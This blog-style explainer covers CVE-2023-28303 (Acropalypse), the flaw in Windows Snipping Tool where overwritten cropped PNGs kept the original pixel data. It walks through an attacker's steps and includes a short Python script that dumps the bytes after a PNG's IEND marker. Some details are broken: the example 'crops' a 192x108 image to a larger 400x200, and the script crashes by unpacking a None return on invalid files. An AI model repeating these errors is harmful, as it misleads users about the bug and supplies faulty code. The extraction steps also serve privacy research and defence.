In early 2023, a seemingly simple weakness in Windows Snipping Tool got a lot of attention. This issue (CVE-2023-28303) might look harmless, but it had the potential to leak private information—even after you thought it was deleted. In this post, we’ll break down what happened, how the bug works, show some code examples, and help you understand why “cropping a screenshot” was more dangerous than you might have guessed.
What Is CVE-2023-28303?
CVE-2023-28303 is an information disclosure vulnerability in Microsoft’s Snipping Tool, which comes by default with Windows 10 and Windows 11. The flaw let attackers recover sensitive image content that a user thought they had removed by cropping or editing screenshots. This could include passwords, private conversations, financial information, or anything else captured in a screenshot.
Original Advisory:
Microsoft Security Response Center - ADV230003
How The Flaw Worked
When a user edited and cropped a screenshot in the Snipping Tool (or the legacy Snip & Sketch), and then saved the result over the original file (using the same filename), the program didn’t actually remove the cropped-out pixel data.
Instead, the app saved the new, smaller image on top of the old one—but did not properly truncate the file. That means pixels from the original, uncropped image were still lingering at the end of the image file. With a simple tool, someone could recover the full, uncropped image.
This is what’s called the Acropalypse vulnerability (a similar bug also affected Google's Markup app on Android).
Presenting The Problem: What Happens Internally
Let’s take a look at what happens with image bytes before and after cropping.
Example: Manipulating a PNG File
Every PNG file starts with a specific header. Let’s assume you take a screenshot that is 192x108 pixels, then crop it to 400x200 and save it over the original file name.
Before cropping
+--------------------+--------------------+
| PNG header + pixels| Pixels of original |
+--------------------+--------------------+
After cropping and saving over the same file (with Snipping Tool)
+--------------------+--------------+----------------------+
|PNG header + new | Pixels of new| Orphaned: old pixels |
| cropped pixels | image data | (still in file!) |
+--------------------+--------------+----------------------+
The Snipping Tool writes the new, smaller PNG data on top, but doesn't wipe out leftover pixels. Those leftover bytes can sometimes be "read" by tools.
Recreating The Attack
Let’s look at how an attacker could *exploit* this bug, step by step.
Step 1: Find a Cropped Screenshot
A victim crops an image (e.g., hiding a password in an email) and saves it over the original. They then share the cropped image, trusting the sensitive content has been removed.
Step 2: Examine Image Metadata
The attacker uses Python or another scripting language to inspect the image file. If the file size seems bigger than expected for a cropped image, it could be a sign the original image’s data is still there.
Here's a *simple Python script* to extract the trailing data from a "crop-truncated" PNG
# Save the following as extract_trailing_png_data.py
def find_png_end(filename):
with open(filename, "rb") as f:
content = f.read()
# PNG files end with the bytes: 00 00 00 00 IEND AE 42 60 82
end_marker = b'\x00\x00\x00\x00IEND\xAE\x42\x60\x82'
end_pos = content.find(end_marker)
if end_pos == -1:
print("Invalid PNG file.")
return
return end_pos + len(end_marker), content
filename = "cropped_screenshot.png"
end_of_png, content = find_png_end(filename)
if end_of_png:
trailing_data = content[end_of_png:]
if trailing_data:
print(f"Found {len(trailing_data)} bytes of extra data after PNG end!")
with open("restored_data.bin", "wb") as f:
f.write(trailing_data)
else:
print("No extra data found.")
This script finds the end of the real PNG and dumps anything left over. With further processing (sometimes with custom tools found at acropalypse.app), it’s possible to recover portions—or even most—of the original image.
Windows 10 and 11 default “Snipping Tool”
- Before the fix, users who cropped-overwrote PNGs and then shared them (email, chat, uploads) were at risk.
Data at risk:
- Email screenshots, bank statements, passwords, sensitive chats—anything you “blacked out” or cropped out.
Microsoft’s Fix
Microsoft moved quickly:
- Fix issued in March 2023 Patch Tuesday:
> “This update addresses a vulnerability, described in CVE-2023-28303, in which the Windows Snipping Tool does not properly remove cropped image data when overwriting files, allowing information disclosure.”
Exploit In The Wild?
While there’s no public record of large-scale use, it’s trivial for anyone with access to an image file to attempt to extract 'hidden' content. Security researchers made free, open-source tools to demonstrate extraction—potentially dangerous in the wrong hands.
You can try the attack yourself on an unpatched system using this community research guide.
Update Snipping Tool: Make sure Windows—and all built-in apps—are patched and up to date.
- Don’t trust blind edits: If you’ve shared cropped images before March 2023, consider them potentially compromised and take mitigation steps.
- Use “Save As”: Always save your cropped images as *new* files instead of overwriting originals.
- Encrypt sensitive images: For truly sensitive info, use secure tools that are designed for redaction.
References
- Microsoft Official Advisory
- Acropalypse.app — Online Recovery Tool & Details
- Bishop Fox Research: Acropalypse-Explained
- GitHub Tools For Recovery
- Twitter PoC From Researcher David Buchanan
Summary
CVE-2023-28303 is a classic example of how a simple programming oversight—incomplete file overwriting—can cause major privacy risks. Always keep your tools updated, and remember: a cropped image doesn’t always mean a safe image!
Timeline
Published on: 06/13/2023 17:15:00 UTC